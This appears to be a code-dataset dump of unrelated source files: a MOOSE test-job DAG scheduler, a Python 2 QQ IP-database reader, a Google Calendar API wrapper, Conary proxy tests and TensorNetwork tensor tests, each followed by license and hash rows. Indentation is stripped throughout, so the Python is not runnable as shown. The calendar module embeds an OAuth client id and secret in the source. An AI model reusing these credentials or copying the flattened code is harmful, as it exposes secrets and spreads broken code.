# it's not we don't care, so just ignore it if was
# somehow deleted between entry of this method
# and here
if os.path.exists(volume_path):
os.unlink(volume_path)
else:
LOG.debug('Volume path %s not found at end, '
'of remove_iscsi_target.', volume_path)
| apache-2.0 | 3,726,398,437,732,719,000 | 40.403175 | 78 | 0.523463 | false |
harterj/moose | python/TestHarness/JobDAG.py | 9 | 11349 | #* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from .schedulers.Job import Job
from contrib import dag
import pyhit
import os
class JobDAG(object):
""" Class which builds a Job DAG for use by the Scheduler """
def __init__(self, options):
self.__job_dag = dag.DAG()
self.__parallel_scheduling = None
self.options = options
def _setParallel(self):
""" Read the test spec file and determine if parallel_scheduling is set. """
if self.__parallel_scheduling is not None:
return self.__parallel_scheduling
self.__parallel_scheduling = False
job = self.getJob()
if job:
# We only need a single tester so we know what spec file to load.
# TODO: would be nice to have access to this without needing tester.specs
tester = job[0].getTester()
root = pyhit.load(os.path.join(tester.specs['test_dir'], tester.specs['spec_file']))
self.__parallel_scheduling = root.children[0].get('parallel_scheduling', False)
return self.__parallel_scheduling
def canParallel(self):
""" Return bool whether or not this group runs in parallel """
return self._setParallel()
def createJobs(self, testers):
""" Return a usable Job DAG based on supplied list of tester objects """
# for each tester, instance a job and create a DAG node for that job
self.__name_to_job = {}
for tester in testers:
job = Job(tester, self, self.options)
name = job.getTestName()
if name not in self.__name_to_job:
self.__name_to_job[name] = job
else:
job.addCaveats('duplicate test')
job.setStatus(job.skip)
self.__job_dag.add_node(job)
return self._checkDAG()
def getDAG(self):
""" return the running DAG object """
return self.__job_dag
def getJobs(self):
""" Return a list of available jobs """
if (self.canParallel() or self.options.pbs) and not self.options.pedantic_checks:
return self.__job_dag.ind_nodes()
return self.getJob()
def getJob(self):
""" Return a single available job """
concurrent_jobs = self.__job_dag.ind_nodes()
if [x for x in concurrent_jobs if x.isHold()]:
return [[x for x in concurrent_jobs if x.isHold()][0]]
return []
def getJobsAndAdvance(self):
"""
return finished jobs, and remove them from the DAG, thus
advancing to the next set of jobs when called again.
"""
# handle any skipped dependencies
self._doSkippedDependencies()
next_jobs = set([])
for job in list(self.__job_dag.ind_nodes()):
if job.isFinished():
next_jobs.add(job)
self.__job_dag.delete_node(job)
next_jobs.update(self.getJobs())
return next_jobs
def removeAllDependencies(self):
""" Flatten current DAG so that it no longer contains any dependency information """
if self.__name_to_job and self.__job_dag.size():
tmp_job_dag = dag.DAG()
for job in self.__job_dag.topological_sort():
tmp_job_dag.add_node(job)
self.__job_dag = tmp_job_dag
return self.__job_dag
def _checkDAG(self):
""" perform some sanity checks on the current DAG """
if self.__job_dag.size():
self._doMakeDependencies()
self._doLast()
# If there are race conditions, then there may be more skipped jobs
if self._doRaceConditions():
self._doSkippedDependencies()
return self.__job_dag
def _addEdge(self, child, parent):
try:
self.__job_dag.add_edge(child, parent)
# Cyclic errors
except dag.DAGValidationError:
err_output = self._printDownstreams(parent)
err_output += ' %s <--> %s' % (parent.getTestName().split('.')[1],
child.getTestName().split('.')[1])
parent.setOutput('Cyclic dependency error!\n\t' + err_output)
parent.setStatus(parent.error, 'Cyclic or Invalid Dependency Detected!')
def _doLast(self):
for job in self.__job_dag.topological_sort():
if 'ALL' in job.getPrereqs():
for a_job in self.__job_dag.topological_sort():
if a_job != job and not a_job.isSkip():
if '.ALL' in a_job.getTestName():
a_job.setStatus(a_job.error, 'Test named ALL when "prereq = ALL" elsewhere in test spec file!')
self._addEdge(a_job, job)
self._doSkippedDependencies()
def _doMakeDependencies(self):
""" Setup dependencies within the current Job DAG """
for job in self.__job_dag.ind_nodes():
prereq_jobs = job.getPrereqs()
if prereq_jobs == ['ALL']:
prereq_jobs = []
for prereq_job in prereq_jobs:
try:
self.__name_to_job[prereq_job]
self._addEdge(self.__name_to_job[prereq_job], job)
# test file has invalid prereq set
except KeyError:
job.setStatus(job.error, 'unknown dependency')
def _hasDownStreamsWithFailures(self, job):
""" Return True if any dependents of job has previous failures """
for d_job in self.__job_dag.all_downstreams(job):
status, message, caveats = d_job.previousTesterStatus(self.options)
if status in d_job.job_status.getFailingStatuses():
return True
def _doPreviouslyFailed(self, job):
"""
Set up statuses for jobs contained within the DAG for use with failed-tests option
"""
tester = job.getTester()
status, message, caveats = job.previousTesterStatus(self.options)
# This job passed, but one of its dependents has not
if status == tester.success and self._hasDownStreamsWithFailures(job):
tester.addCaveats('re-running')
return
# This job was skipped, passed or silent
elif status in job.job_status.getSuccessStatuses():
tester.setStatus(tester.silent)
job.setStatus(job.finished)
# Remaining independent 'skipped' jobs we don't want to print output for
elif not job.getRunnable():
tester.setStatus(tester.silent)
job.setStatus(job.finished)
# Remaining jobs are failures of some sort. Append the previous result as a caveat.
if message:
tester.addCaveats('previous results: {}'.format(message))
def _doSkippedDependencies(self):
""" Determine which jobs in the DAG should be skipped """
for job in list(self.__job_dag.topological_sort()):
dep_jobs = set([])
if self.options.failed_tests:
self._doPreviouslyFailed(job)
if not job.getRunnable() or job.isFail() or job.isSkip():
job.setStatus(job.skip)
dep_jobs.update(self.__job_dag.all_downstreams(job))
# Remove parent dependency so it can launch individually
for p_job in self.__job_dag.predecessors(job):
self.__job_dag.delete_edge_if_exists(p_job, job)
for d_job in dep_jobs:
d_tester = d_job.getTester()
if job.isSilent() and not d_job.getRunnable():
d_tester.setStatus(d_tester.silent)
elif not self._skipPrereqs():
d_job.setStatus(d_job.skip)
d_job.addCaveats('skipped dependency')
self.__job_dag.delete_edge_if_exists(job, d_job)
def _doRaceConditions(self):
""" Check for race condition errors within in the DAG"""
# Build output_file in relation to job dictionary
output_to_job = {}
for job in self.__job_dag.topological_sort():
if job.getRunnable() and not job.isFinished():
for output_file in job.getOutputFiles():
output_to_job[output_file] = output_to_job.get(output_file, [])
output_to_job[output_file].append(job)
# Remove jobs which have accurate dependencies
for outfile, job_list in output_to_job.items():
for job in list(job_list):
for match_job in self.__job_dag.all_downstreams(job):
if match_job in job_list:
job_list.remove(match_job)
# Left over multiple items in job_list are problematic
for outfile, job_list in output_to_job.items():
# Same test has duplicate output files
if len(job_list) > 1 and len(set(job_list)) == 1:
job_list[0].setOutput('Duplicate output files:\n\t%s\n' % (outfile))
job_list[0].setStatus(job.error, 'DUPLICATE OUTFILES')
# Multiple tests will clobber eachothers output file
# Only check this with parallel_scheduling enabled because otherwise
# all of these jobs will be serialized
elif len(job_list) > 1 and self._setParallel():
for job in job_list:
job.setOutput('Output file will over write pre-existing output file:\n\t%s\n' % (outfile))
job.setStatus(job.error, 'OUTFILE RACE CONDITION')
def _skipPrereqs(self):
"""
Method to return boolean to skip dependency prerequisites checks.
"""
if (self.options.ignored_caveats
and ('all' in self.options.ignored_caveats
or 'prereq' in self.options.ignored_caveats)):
return True
def _printDownstreams(self, job):
"""
create a printable dependency chart of for supplied job
# TODO: It would be super cool to print the entire DAG
in this fashion.
"""
downstreams = self.__job_dag.all_downstreams(job)
cyclic_path = []
for d_job in downstreams:
cyclic_path.append('%s -->'% (d_job.getTestNameShort()))
return ' '.join(cyclic_path)
def printDAG(self):
""" Print the current structure of the DAG """
job_order = []
cloned_dag = self.__job_dag.clone()
while cloned_dag.size():
concurrent_jobs = cloned_dag.ind_nodes(cloned_dag.graph)
if len(concurrent_jobs) > 1:
job_order.extend([x.getTestNameShort() for x in concurrent_jobs])
else:
if job_order:
job_order.extend(['<--', concurrent_jobs[0].getTestNameShort()])
else:
job_order.append(concurrent_jobs[0].getTestNameShort())
for job in concurrent_jobs:
cloned_dag.delete_node(job)
print('\n###### JOB ORDER ######\n', ' '.join(job_order))
| lgpl-2.1 | -5,989,466,196,529,192,000 | 39.971119 | 123 | 0.575205 | false |
noogel/xyzStudyPython | python/qqwry/qq_ip_query.py | 1 | 9212 | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import os
import sys, _socket, mmap
from struct import unpack, pack
DataFileName = "qq_ip_database.Dat"
def _ip2ulong(ip):
'''ip(0.0.0.0) -> unsigned long'''
return unpack('>L', _socket.inet_aton(ip))[0]
def _ulong2ip(ip):
'''unsigned long -> ip(0.0.0.0)'''
return _socket.inet_ntoa(pack('>L', ip))
class QQIpQueryBase:
'''
QQIpQueryBase, 提供基本查找功能.
注意返回的国家和地区信息都是未解码的字符串, 对于简体版数据库应为GB编码, 对于繁体版则应为BIG5编码.
'''
class ipInfo(tuple):
'''
方便输出 ip 信息的类.
ipInfo((sip, eip, country, area)) -> ipInfo object
'''
def __str__(self):
return str(self[0]).ljust(16) + ' - ' + str(self[1]).rjust(16) + ' ' + self[2] + self[3]
def normalize(self):
'''
转化ip地址成点分十进制.
'''
return QQIpQueryBase.ipInfo((_ulong2ip(self[0]), _ulong2ip(self[1]), self[2], self[3]))
def __init__(self, dbfile):
'''
QQIpQueryBase(dbfile) -> QQIpQueryBase object
dbfile 是数据库文件的 file 对象.
'''
self.f = dbfile
self.f.seek(0)
self.indexBaseOffset = unpack('<L', self.f.read(4))[0] # 索引区基址
self.Count = (unpack('<L', self.f.read(4))[0] - self.indexBaseOffset) / 7 # 索引数-1
def Lookup(self, ip):
'''
x.Lookup(ip) -> (sip, eip, country, area) 查找 ip 所对应的位置.
ip, sip, eip 是点分十进制记录的 ip 字符串.
sip, eip 分别是 ip 所在 ip 段的起始 ip 与结束 ip.
'''
return self.nLookup(_ip2ulong(ip))
def nLookup(self, ip):
'''
x.nLookup(ip) -> (sip, eip, country, area) 查找 ip 所对应的位置.
ip 是 unsigned long 型 ip 地址.
其它同 x.Lookup(ip).
'''
si = 0
ei = self.Count
if ip < self._readIndex(si)[0]:
raise StandardError('IP NOT Found.')
elif ip >= self._readIndex(ei)[0]:
si = ei
else: # keep si <= ip < ei
while (si + 1) < ei:
mi = (si + ei) // 2
if self._readIndex(mi)[0] <= ip:
si = mi
else:
ei = mi
ipinfo = self[si]
if ip > ipinfo[1]:
raise StandardError('IP NOT Found.')
else:
return ipinfo
def __str__(self):
tmp = []
tmp.append('RecCount:')
tmp.append(str(len(self)))
tmp.append('\nVersion:')
tmp.extend(self[self.Count].normalize()[2:])
return ''.join(tmp)
def __len__(self):
return self.Count + 1
def __getitem__(self, key):
'''
x[key]
若 key 为整数, 则返回第key条记录(从0算起, 注意与 x.nLookup(ip) 不一样).
若 key 为点分十进制的 ip 描述串, 同 x.Lookup(key).
'''
if type(key) == type(0):
if (key >= 0) and (key <= self.Count):
index = self._readIndex(key)
sip = index[0]
self.f.seek(index[1])
eip = unpack('<L', self.f.read(4))[0]
(country, area) = self._readRec()
return QQIpQueryBase.ipInfo((sip, eip, country, area))
else:
raise KeyError('INDEX OUT OF RANGE.')
elif type(key) == type(''):
try:
return self.Lookup(key).normalize()
except StandardError, e:
if e.message == 'IP NOT Found.':
raise KeyError('IP NOT Found.')
else:
raise e
else:
raise TypeError('WRONG KEY TYPE.')
def __iter__(self):
'''返回迭代器(生成器).'''
for i in range(0, len(self)):
yield self[i]
def _read3ByteOffset(self):
'''_read3ByteOffset() -> unsigned long 从文件 f 读入长度为3字节的偏移.'''
return unpack('<L', self.f.read(3) + '\x00')[0]
def _readCStr(self):
'''x._readCStr() -> string 读 '\0' 结尾的字符串.'''
if self.f.tell() == 0:
return 'Unknown'
tmp = []
ch = self.f.read(1)
while ch != '\x00':
tmp.append(ch)
ch = self.f.read(1)
return ''.join(tmp)
def _readIndex(self, n):
'''x._readIndex(n) -> (ip ,offset) 读取第n条索引.'''
self.f.seek(self.indexBaseOffset + 7 * n)
return unpack('<LL', self.f.read(7) + '\x00')
def _readRec(self, onlyOne=False):
'''x._readRec() -> (country, area) 读取记录的信息.'''
mode = unpack('B', self.f.read(1))[0]
if mode == 0x01:
rp = self._read3ByteOffset()
bp = self.f.tell()
self.f.seek(rp)
result = self._readRec(onlyOne)
self.f.seek(bp)
return result
elif mode == 0x02:
rp = self._read3ByteOffset()
bp = self.f.tell()
self.f.seek(rp)
result = self._readRec(True)
self.f.seek(bp)
if not onlyOne:
result.append(self._readRec(True)[0])
return result
else: # string
self.f.seek(-1, 1)
result = [self._readCStr()]
if not onlyOne:
result.append(self._readRec(True)[0])
return result
pass # End of class QQIpQueryBase
class QQIpQuery(QQIpQueryBase):
'''QQIpQuery 类.'''
def __init__(self, filename='qq_ip_database.Dat'):
'''QQIpQuery(filename) -> QQIpQuery object
filename 是数据库文件名.
'''
f = open(filename, 'rb')
QQIpQueryBase.__init__(self, f)
class MQQIpQuery(QQIpQueryBase):
'''MQQIpQuery 类.
将数据库放到内存的 QQIpQuery 类.查询速度大约快两倍.
'''
def __init__(self, filename=DataFileName, dbfile=None):
'''MQQIpQuery(filename[,dbfile]) -> MQQIpQuery object
filename 是数据库文件名.
也可以直接提供 dbfile 文件对象. 此时 filename 被忽略.
'''
if dbfile == None:
try:
UPLOAD_DIR = os.path.dirname(os.path.realpath(__file__))
filename = '%s/%s' % (UPLOAD_DIR, filename)
dbf = open(filename, 'rb')
except IOError:
print "ERROR:", filename, "is not exist!"
sys.exit(1)
else:
dbf = dbfile
bp = dbf.tell()
dbf.seek(0)
QQIpQueryBase.__init__(self, mmap.mmap(dbf.fileno(), 0, access=1))
dbf.seek(bp)
def _readCStr(self):
'''x._readCStr() -> string 读 '\0' 结尾的字符串.'''
pstart = self.f.tell()
if pstart == 0:
return 'unknown'
else:
pend = self.f.find('\x00', pstart)
if pend < 0:
raise StandardError('Fail To Read CStr.')
else:
self.f.seek(pend + 1)
return self.f[pstart:pend].decode('GBK').encode('UTF-8')
def _readIndex(self, n):
'''x._readIndex(n) -> (ip ,offset) 读取第n条索引.'''
startp = self.indexBaseOffset + 7 * n
return unpack('<LL', self.f[startp:startp + 7] + '\x00')
# def get_ip_list(ip_list):
# try:
# Q = MQQIpQuery()
# results = []
#
# print ip_list
# for item in ip_list:
# address = str(item['address'])
# count = item['count']
# result = {}
# result['address'] = address
# result['region'] = ''.join(Q[address][2:])
# result['type'] = ''.join(Q[address][3:])
# result['count'] = count
# print "result:", result
# results.append(result)
# print results
# return results
# except Exception, err:
# print err
# return None
if __name__ == '__main__':
try:
Q = MQQIpQuery() # 数据库文件名为 ./qq_ip_database.Dat
if len(sys.argv) == 1:
print Q
if len(sys.argv) == 2:
if sys.argv[1] == '-': # 参数只有一个“-”时, 从标准输入读取IP
print ''.join(Q[raw_input()][2:])
elif sys.argv[1] in ('all', '-a', '-all'): # 遍历示例代码
for i in Q:
print i.normalize()
else: # 参数只有一个IP时, 只输出简要的信息
print ''.join(Q[sys.argv[1]][2:]).decode("utf-8")
else:
for i in sys.argv[1:]:
print Q[i]
except StandardError, e:
if e.message != '':
print e.message
else:
raise e
finally:
pass
| apache-2.0 | 2,556,463,129,593,330,700 | 29.101449 | 100 | 0.463653 | false |
felixb/v2gcalendar | v2gcalendar/calendar_service.py | 1 | 3566 | __author__ = 'flx'
from apiclient.discovery import build
import httplib2
from oauth2client import tools
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.file import Storage
from oauth2client.tools import run_flow
# For this example, the client id and client secret are command-line arguments.
client_id = \
'826222712854-das8sdv4veehjje2o4e45sbvnrd8fi5n.apps.googleusercontent.com'
client_secret = 'CKBI_J4aE7QaEWLTxTyjGF-u'
# The scope URL for read/write access to a user's calendar data
scope = 'https://www.googleapis.com/auth/calendar'
# Create a flow object. This object holds the client_id, client_secret, and
# scope. It assists with OAuth 2.0 steps to get user authorization and
# credentials.
flow = OAuth2WebServerFlow(client_id, client_secret, scope)
class CalendarService:
def __init__(self):
self._service = None
self.init_service()
def init_service(self):
if self._service:
return
storage = Storage('credentials.dat')
credentials = storage.get()
if not credentials or credentials.invalid:
parser = tools.argparser
flags = parser.parse_args([])
credentials = run_flow(flow, storage, flags)
http = httplib2.Http()
http = credentials.authorize(http)
self._service = build('calendar', 'v3', http=http)
def get_calendars(self):
result = []
request = self._service.calendarList().list()
while request:
response = request.execute()
for calendar in response.get('items', []):
result.append(calendar)
request = self._service.calendarList().list_next(request, response)
return result
def find_calendar(self, name):
calendars = self.get_calendars()
for calendar in calendars:
if calendar['summary'] == name:
return calendar['id']
def clear(self, calendar_id):
request = self._service.calendars().clear(calendarId=calendar_id)
result = request.execute()
return result
def get_events(self, calendar_id, show_deleted=False):
results = []
request = self._service.events().list(calendarId=calendar_id,
showDeleted=show_deleted)
while request:
response = request.execute()
for event in response.get('items', []):
results.append(event)
request = self._service.events().list_next(request, response)
return results
def add_event(self, calendar_id, event):
response = self._service.events().insert(calendarId=calendar_id,
body=event,
sendNotifications=False)\
.execute()
return response
def update_event(self, calendar_id, event):
response = self._service.events().update(calendarId=calendar_id,
eventId=event['id'],
body=event,
sendNotifications=False)\
.execute()
return response
def delete_event(self, calendar_id, event_id):
response = self._service.events().delete(calendarId=calendar_id,
eventId=event_id,
sendNotifications=False)\
.execute()
return response
| apache-2.0 | -2,096,562,204,030,105,600 | 35.387755 | 79 | 0.579641 | false |
sassoftware/conary | conary_test/repositorytest/netrepostest/proxytest.py | 1 | 13556 | #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from testrunner import testcase, testhelp
from testutils import mock
from testutils.servers import memcache_server
import copy
import os
from conary_test import rephelp
from conary import conaryclient
from conary import trove
from conary.files import ThawFile
from conary.repository import errors
from conary.repository.netrepos import proxy as netreposproxy
from conary.repository.netrepos import netserver
from conary.repository.netrepos.auth_tokens import AuthToken
def runproxy(**params):
def deco(fn):
def dorunproxy(obj, *args, **kwargs):
if 'CONARY_PROXY' in os.environ:
raise testhelp.SkipTestException("testInjectedEntitlements doesn't run with a proxy already running")
memcache = None
if params.pop('memcache', False):
memcache = memcache_server.MemcacheServer()
memcache.start()
params['cacheLocation'] = memcache.getHostPort()
proxy = obj.getConaryProxy(**params)
obj.stopRepository(1)
obj.openRepository(1, useSSL = True, forceSSL = True)
cfg = copy.deepcopy(obj.cfg)
proxy.addToConfig(cfg)
client = conaryclient.ConaryClient(cfg)
repos = client.getRepos()
proxy.start()
try:
fn(obj, repos, *args, **kwargs)
finally:
proxy.stop()
if memcache:
memcache.stop()
server = obj.servers.getServer(1)
if server is not None:
server.reset()
obj.stopRepository(1)
dorunproxy.func_name = fn.func_name
return dorunproxy
return deco
class ProxyUnitTest(testcase.TestCaseWithWorkDir):
def testGetChangeSet(self):
# Now mock ChangesetCache, to log things
origChangesetCache = netreposproxy.ChangesetCache
lockLogFile = os.path.join(self.workDir, "locks.log")
class MockChangesetCache(origChangesetCache):
llf = file(lockLogFile, "a")
def get(slf, key, shouldLock = True):
csPath = origChangesetCache.hashKey(slf, key)
ret = origChangesetCache.get(slf, key, shouldLock=shouldLock)
if shouldLock and ret is None:
slf.llf.write("Lock acquired for %s\n" % csPath)
self.assertTrue(os.path.exists(csPath + '.lck'))
return ret
def set(slf, key, value):
csPath = origChangesetCache.hashKey(slf, key)
if csPath in slf.locksMap:
slf.llf.write("Releasing lock for %s\n" % csPath)
return origChangesetCache.set(slf, key, value)
def resetLocks(slf):
for csPath in sorted(slf.locksMap):
slf.llf.write("Resetting unused lock for %s\n" % csPath)
return origChangesetCache.resetLocks(slf)
self.mock(netreposproxy, 'ChangesetCache', MockChangesetCache)
cfg = netserver.ServerConfig()
cfg.changesetCacheDir = os.path.join(self.workDir, "changesetCache")
cfg.proxyContentsDir = os.path.join(self.workDir, "proxyContents")
prs = netreposproxy.ProxyRepositoryServer(cfg, "/someUrl")
rawUrl = '/blah'
headers = {'X-Conary-Proxy-Host' : 'repos.example.com'}
prs.setBaseUrlOverride(rawUrl, headers, isSecure = True)
# callWrapper normally sets this, but nothing here invokes it
prs._serverName = 'repos.example.com'
caller = mock.mockClass(netreposproxy.ProxyCaller)()
caller._getBasicUrl._mock.setDefaultReturn('http://blah')
caller.checkVersion._mock.setDefaultReturn([51, 52, 53])
# Make sure we present the fingerprints in non-sorted order, we need
# to verify we sort them
suf = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
fingerprints = ['aac3aac3' + suf, 'aaa1aaa1' + suf, 'aab2aab2' + suf]
caller.getChangeSetFingerprints._mock.setDefaultReturn(fingerprints)
csSizes = [ 12, 13, 14 ]
allInfo = [
(str(x), 'trovesNeeded%d' % i, 'filesNeeded%d' % i,
'removedTroves%d' % i, str(x))
for i, x in enumerate(csSizes) ]
csFileObj = file(os.path.join(self.workDir, "changeset"), "w+")
magic = netreposproxy.filecontainer.FILE_CONTAINER_MAGIC
fver = netreposproxy.filecontainer.FILE_CONTAINER_VERSION_FILEID_IDX
fver = netreposproxy.filecontainer.struct.pack("!I", fver)
for i, csSize in enumerate(csSizes):
csFileObj.write(magic)
csFileObj.write(fver)
rest = csSize - len(magic) - len(fver)
csFileObj.write((chr(ord('a') + i) * rest))
csFileObj.seek(0)
changeSetList = [ (x, (None, None), (None, None), False) for x in
['a', 'b', 'c'] ]
caller.getChangeSet._mock.appendReturn(
('http://repos.example.com/my-changeset-url', allInfo),
53, changeSetList, False, True, False, True, 2007022001,
False, False)
urlOpener = mock.MockObject()
uo = mock.MockObject()
self.mock(netreposproxy.transport, 'ConaryURLOpener', urlOpener)
urlOpener._mock.setDefaultReturn(uo)
uo.open._mock.appendReturn(
csFileObj,
'http://repos.example.com/my-changeset-url',
forceProxy=caller._lastProxy,
headers=[('X-Conary-Servername', 'repos.example.com')])
authToken = AuthToken(None, None, [])
clientVersion = 51
prs.getChangeSet(caller, authToken, clientVersion, changeSetList,
recurse = False, withFiles = True, withFileContents = False,
excludeAutoSource = True)
MockChangesetCache.llf.close()
f = file(lockLogFile)
contents = [ x.strip() for x in f ]
sortedFP = sorted(fingerprints)
logEntries1 = contents[:len(fingerprints)]
self.assertEqual(logEntries1,
[ 'Lock acquired for %s/%s/%s-2007022001.1' %
(cfg.changesetCacheDir, fp[:2], fp[2:])
for fp in sortedFP ])
logEntries2 = contents[len(fingerprints):2 * len(fingerprints)]
self.assertEqual(logEntries2,
[ 'Releasing lock for %s/%s/%s-2007022001.1' %
(cfg.changesetCacheDir, fp[:2], fp[2:])
for fp in fingerprints ])
# We're not releasing locks we didn't close
self.assertEqual(len(contents), 2 * len(fingerprints))
class ProxyTest(rephelp.RepositoryHelper):
def _getRepos(self, proxyRepos):
hostname = 'localhost1'
label = self.cfg.buildLabel.asString().replace('localhost', hostname)
repos = self.openRepository(1, useSSL = True, forceSSL = True)
return repos, label, hostname
@runproxy(entitlements = [ ('localhost1', 'ent1234') ])
def testInjectedEntitlements(self, proxyRepos):
repos, label, hostname = self._getRepos(proxyRepos)
repos.addRole(label, 'entgroup')
repos.addAcl(label, 'entgroup', None, None)
repos.addEntitlementClass(hostname, 'entgroup', 'entgroup')
repos.addEntitlementKeys(hostname, 'entgroup', [ 'ent1234' ])
repos.deleteUserByName(label, 'anonymous')
repos.deleteUserByName(label, 'test')
# since both users have been erased from the repository, this can
# only work if the entitlement got added by the proxy
proxyRepos.c[hostname].checkVersion()
def testInjectedEntitlementsNonSSL(self):
# CNY-3176
# We are trying to force the situation where an entitlement was
# injected for a server running on the default http port (80, but the
# URL not specifying it).
self.cfg.entitlement.append(('example.com', 'sikrit'))
authToken = AuthToken('test', 'foo', [], '127.0.0.1')
caller = netreposproxy.ProxyCallFactory.createCaller('unused', 'unused',
'http://example.com/conary', proxyMap = self.cfg.getProxyMap(),
authToken = authToken, localAddr = '1.2.3.4',
protocolString = "protocolString", headers = {}, cfg = self.cfg,
targetServerName = 'example.com', remoteIp = '5.6.7.8',
isSecure = False, baseUrl = "http://blah", systemId='foo')
self.assertEquals(caller.url.scheme, 'https')
self.assertEquals(caller.url.hostport.port, 443)
# This whole thing points out a workaround for _not_ going through SSL
# if you choose so: add a repositoryMap that explicitly adds :80 to
# the server URL.
@runproxy(users = [ ('localhost1', 'otheruser', 'pw') ])
def testUserOverrides(self, proxyRepos):
repos, label, hostname = self._getRepos(proxyRepos)
self.addUserAndRole(repos, label, 'otheruser', 'pw')
repos.addAcl(label, 'otheruser', None, None)
repos.deleteUserByName(label, 'anonymous')
repos.deleteUserByName(label, 'test')
# since both users have been erased from the repository, this can
# only work if the 'other' user is added in by the proxy
proxyRepos.c[hostname].checkVersion()
def testTruncatedChangesets(self):
"""
Test that a proxy will not cache a changeset that has been truncated in
transit.
"""
# Get a proxy server and a repository server both with changeset caches.
self.stopRepository(2)
repos = self.openRepository(2)
reposServer = self.servers.getCachedServer(2)
proxyServer = self.getConaryProxy()
proxyServer.start()
try:
cfg = copy.deepcopy(self.cfg)
proxyServer.addToConfig(cfg)
client = conaryclient.ConaryClient(cfg)
proxyRepos = client.getRepos()
trv = self.addComponent('foo:data', '/localhost2@rpl:linux/1-1-1',
repos=repos)
jobList = [ (trv.getName(), (None, None),
(trv.getVersion(), trv.getFlavor()), True) ]
# First populate the repository (not proxy) cscache
kwargs = dict(recurse=False, withFiles=True, withFileContents=True,
excludeAutoSource=False)
cs = repos.createChangeSet(jobList, **kwargs)
# Now corrupt the changeset and try to pull it through the proxy
# cache. Unfortunately the simplest way to do this is to truncate
# the contents file which is transcluded into the changeset. We get
# the path to that using the file contents sha1 from the changeset
# we fetched earlier.
assert len(cs.files) == 1
sha1 = ThawFile(cs.files.values()[0], None).contents.sha1()
sha1 = sha1.encode('hex')
path = os.path.join(reposServer.contents.getPath(),
sha1[:2], sha1[2:4], sha1[4:])
os.rename(path, path + '.old')
with open(path, 'w') as f:
f.write('hahaha')
# At this point, fetching a changeset through the proxy should fail.
err = self.assertRaises(errors.RepositoryError,
proxyRepos.createChangeSet, jobList, **kwargs)
if 'truncated' not in str(err) and 'corrupted' not in str(err):
self.fail("Unexpected error when fetching truncated "
"changeset: %s" % str(err))
# If we put the file back, it should succeed.
os.rename(path + '.old', path)
proxyRepos.createChangeSet(jobList, **kwargs)
finally:
proxyServer.stop()
self.stopRepository(2)
@runproxy(memcache=True)
def testProxyCaching(self, proxyRepos):
raise testcase.SkipTestException("fails randomly")
ver0 = "/localhost1@rpl:linux/1-1-1"
trv0 = self.addComponent("foo:data", ver0, filePrimer = 1)
trv = proxyRepos.getTrove(*trv0.getNameVersionFlavor())
deps = proxyRepos.getDepsForTroveList([ trv.getNameVersionFlavor() ],
provides = True, requires = True)
ti = proxyRepos.getTroveInfo(trove._TROVEINFO_TAG_SOURCENAME,
[ trv.getNameVersionFlavor() ])
self.stopRepository(1)
trv1 = proxyRepos.getTrove(*trv0.getNameVersionFlavor())
deps1 = proxyRepos.getDepsForTroveList([ trv.getNameVersionFlavor() ],
provides = True, requires = True)
ti1 = proxyRepos.getTroveInfo(trove._TROVEINFO_TAG_SOURCENAME,
[ trv.getNameVersionFlavor() ])
self.assertEquals(trv, trv1)
self.assertEquals(deps, deps1)
self.assertEquals(ti, ti1)
# we reopen it for proper cleanup in the runproxy() decorator
self.openRepository(1)
| apache-2.0 | 2,241,642,500,559,587,600 | 41.23053 | 117 | 0.612423 | false |
google/TensorNetwork | tensornetwork/tests/tensor_test.py | 1 | 14595 | # Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import numpy as np
import jax
import jax.numpy as jnp
from jax import config
import tensorflow as tf
import torch
import pytest
import tensornetwork
from tensornetwork.backends import abstract_backend
from tensornetwork import backends, backend_contextmanager
from tensornetwork.tests import testing_utils
from tensornetwork import ncon_interface
#pylint: disable=no-member
config.update("jax_enable_x64", True)
BaseBackend = abstract_backend.AbstractBackend
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_init_tensor_from_numpy_array(backend, dtype):
""" Creates a numpy array, initializes a Tensor from it, and checks that all
its members have been correctly initialized.
"""
A, init = testing_utils.safe_zeros((2, 3, 1), backend, dtype)
if A is None:
return
assert A.backend.name == backend
np.testing.assert_allclose(A.array, init)
assert A.shape == init.shape
assert A.size == init.size
assert A.ndim == init.ndim
@pytest.mark.parametrize("dtype", testing_utils.torch_supported_dtypes)
def test_init_tensor_default_backend(dtype):
""" Creates a numpy array, initializes a Tensor from it, and checks that all
its members have been correctly initialized.
"""
backend = backend_contextmanager.get_default_backend()
backend_obj = backends.backend_factory.get_backend(backend)
shape = (3, 5, 2)
testA = backend_obj.zeros(shape, dtype=dtype)
init = np.zeros(shape, dtype=dtype)
A = tensornetwork.Tensor(init)
assert A.backend.name == backend
np.testing.assert_allclose(A.array, testA)
assert A.shape == testA.shape
assert A.size == testA.size
assert A.ndim == testA.ndim
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_init_tensor_from_backend_array(backend, dtype):
"""
Creates an instance of the backend's array class, initializes a Tensor from
it, and checks that all its members have been correctly initialized.
"""
shape = (2, 3, 1)
if backend == "pytorch":
if dtype not in testing_utils.torch_supported_dtypes:
with pytest.raises(TypeError):
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
return
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = torch.zeros(shape, dtype=dtype)
elif backend == "numpy":
